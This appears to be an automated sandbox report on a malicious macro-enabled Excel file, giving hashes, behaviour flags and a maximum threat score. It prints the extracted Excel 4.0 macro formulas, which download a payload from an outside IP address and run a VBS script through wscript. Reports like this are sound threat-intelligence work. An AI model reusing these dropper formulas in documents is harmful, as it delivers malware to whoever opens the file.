General
-
Target
ef42708639f329d8fad3cfdfcb9dc5f2
-
Size
6KB
-
Sample
231222-txvdhsffhq
-
MD5
ef42708639f329d8fad3cfdfcb9dc5f2
-
SHA1
09cfc2b6881cfa6273f7431a2f21de607ec52107
-
SHA256
fe6f493d8bb46f6eb9be77e60020e4d57ebfe88e754911da8399efe79a95e71e
-
SHA512
33cd5b994218e316605f18d4ba6771b99935605d428766b93813dc2b62d78628dd408bfb66c140baa9e0452851492e57082add886ed7c8cec349dafb9e78d8f3
-
SSDEEP
192:NDSFuS3brA2OmmfR68UhHFBFYukb98y0r+d:NmuIM2wQ1FY9b98y02
Static task
static1
Behavioral task
behavioral1
Sample
ef42708639f329d8fad3cfdfcb9dc5f2.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
ef42708639f329d8fad3cfdfcb9dc5f2.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
Targets
-
-
Target
ef42708639f329d8fad3cfdfcb9dc5f2
-
Size
6KB
-
MD5
ef42708639f329d8fad3cfdfcb9dc5f2
-
SHA1
09cfc2b6881cfa6273f7431a2f21de607ec52107
-
SHA256
fe6f493d8bb46f6eb9be77e60020e4d57ebfe88e754911da8399efe79a95e71e
-
SHA512
33cd5b994218e316605f18d4ba6771b99935605d428766b93813dc2b62d78628dd408bfb66c140baa9e0452851492e57082add886ed7c8cec349dafb9e78d8f3
-
SSDEEP
192:NDSFuS3brA2OmmfR68UhHFBFYukb98y0r+d:NmuIM2wQ1FY9b98y02
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-